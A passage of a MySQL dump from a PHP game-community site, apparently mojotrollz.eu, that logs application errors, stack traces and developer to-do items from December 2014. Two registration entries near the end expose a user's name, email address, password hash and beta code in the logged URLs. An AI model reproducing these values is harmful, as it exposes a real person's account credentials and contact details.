SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-22 05:16:13', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=saimod%20object', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (845, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'Subname\' in \'where clause\'', '2263defa3423bae8bcb14971fafe88498bed2d4d', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-item\', \'SELECT item_tem...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_item/saimod_mojotrollz_db_item.php(81): SYSTEM\\DB\\Connection->prepare(\'search-item\', \'SELECT item_tem...\', Array)\n#2 [internal function]: saimod_mojotrollz_db_item::sai_mod_saimod_mojotrollz_db_item()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.012, '2014-12-22 05:28:21', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_item', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (846, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\DB_ITEM_TEMPLATE_ITEM', '86b0a05fa703799019f8387aaf37b92076004c60', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\DB_ITEM_TEM...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_item/saimod_mojotrollz_db_item.php(19): spl_autoload_call(\'DBD\\\\DB_ITEM_TEM...\')\n#2 [internal function]: saimod_mojotrollz_db_item::sai_mod_saimod_mojotrollz_db_item_action_item(\'25\')\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.008, '2014-12-22 05:35:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_item&action=item&id=25', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (847, 'Exception', 'item saimod', 'deaba2e247c164c32d470ed23a7e15b6109a260a', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'item saimod\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-22 05:36:48', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=item%20saimod', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (848, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\TOOLTIP_QUEST', 'e7b129601ae6c5313634b28e76f42a61fbe0ba5d', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\TOOLTIP_QUE...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/api/database/tooltip/tooltip.php(12): spl_autoload_call(\'DBD\\\\TOOLTIP_QUE...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/api_mojotrollz.php(42): tooltip::html(\'4\', \'32\')\n#3 [internal function]: api_mojotrollz::call_tooltip(\'4\', \'32\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.242', 0.08, '2014-12-22 06:42:04', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=tooltip&type=4&id=32', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (849, 'Exception', 'quest map beautify atm @ gameobject', '24313788f3233a69214ebd39c43133d3d9e45a59', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'quest map beaut...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-22 06:44:14', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=quest%20map%20beautify', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (850, 'Exception', 'tag objects', '2dec170d1662cadc663b56f31cc7acdee0b0bf88', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'tag objects\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-22 06:51:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=tag%20objects', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (851, 'Exception', '3. Deploy Process', '73513737f5378e78b9a6dc3503798fd195695dc0', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Deploy Process\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 07:19:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Deploy%20Process', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (852, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\BETA_GET_CODE', 'd38677749b53977cab642e2f73f274731b587d55', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\BETA_GET_CO...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_beta/saimod_mojotrollz_beta.php(6): spl_autoload_call(\'DBD\\\\BETA_GET_CO...\')\n#2 [internal function]: saimod_mojotrollz_beta::sai_mod_saimod_mojotrollz_beta()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.012, '2014-12-23 07:36:23', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_beta', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (853, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'su1.username as name_user, su2.username as name_user_new FROM mojotrollz_beta LE\' at line 1', '404022399c991ec54c3021be9d9bcdf817510d5a', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT mojotrol...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT mojotrol...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_beta/saimod_mojotrollz_beta.php(6): SYSTEM\\DB\\QQ::QQ()\n#3 [internal function]: saimod_mojotrollz_beta::sai_mod_saimod_mojotrollz_beta()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.008, '2014-12-23 07:36:34', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_beta', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (854, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: generate', 'b7ac8896d316408e33e36dfa2406d6a18125b303', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 151, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 0, \'saimod_mojotrol...\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.008, '2014-12-23 07:51:23', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_beta', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (856, 'Exception', '1. Account saimod', '00a43cae852d10238a3818485f6061ca5072c55c', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Account saimod\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 09:05:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Account%20saimod', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (857, 'Exception', 'System saimod log 2h fix', '0c22bbd92726ec7ff36e3ad834f5ea310d700e1b', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'System saimod l...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 09:08:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=System%20saimod%20log%202h%20fix', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (858, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: status Verifier: INT', '587396f2768612d98ebc2327fe887509c69f0a7e', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 1200, \'change\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.008, '2014-12-23 10:29:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron&action=change&cls=\\SYSTEM\\CRON\\cron_log2sqlite&status=undefined', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (859, 'Exception', '2. Todo Statistics extendable -> tag statistics', 'c88823ca5d8bf32b7a17a5ae1b746c78c506301b', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Todo Statistics...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 10:52:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Todo%20Statistics%20extendable', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (860, 'Exception', '2. Todo Assign', 'd0da5e93ca2440a39abb06e19dd4b5fcff773623', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Todo Assign\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-23 11:13:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Todo%20Assign', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (861, 'Exception', 'Scaling Mechanics', 'fe5a049153bf0169d091f0e84f4eaf8b07b699f9', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Scaling Mechani...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.012, '2014-12-23 11:14:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Scaling%20Mechanics', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (862, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 8; statics: 0; req_command: 2; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=account&&action=register&username=rylon&password=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=111111111111&wow_password=', 'e28152db1792c3522f09163f7cf2d3acb5c15a89', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '37.24.148.242', 0.008, '2014-12-23 13:56:49', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&&action=register&username=rylon&password=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=111111111111&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (863, 'SYSTEM\\LOG\\ERROR', 'Parameter missing: password_sha', '06d6196e8245ecfaefbf6efa7dc4ff4f672a024b', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 151, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 11, \'create\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz_...\', Array)\n#2 {main}', '37.24.148.242', 0.004, '2014-12-23 13:58:24', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=account&action=create&username=rylon&password=90009b3fb5a425808fe9398bc9ff55e93ae283ab&email=rylon@web.de&locale=enUS&betacode=111111111111&wow_password=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, 